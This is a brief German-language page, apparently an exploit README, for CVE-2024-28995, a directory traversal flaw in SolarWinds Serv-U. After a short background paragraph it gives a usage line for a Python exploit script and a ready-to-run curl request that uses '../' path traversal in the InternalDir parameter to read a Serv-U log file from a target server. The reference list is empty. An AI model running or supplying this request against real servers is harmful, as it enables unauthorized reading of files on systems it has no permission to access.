
Exploit für CVE-2024-28995
Am 5. Juni 2024 veröffentlichte SolarWinds einen Advisory für CVE-2024-28995, eine kritische Directory-Traversal-Schwachstelle, die ihre Dateiübertragungslösung Serv-U betrifft. Die Schwachstelle wurde von dem Forscher Hussein Daher von Web Immunify entdeckt.
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
Referenzen: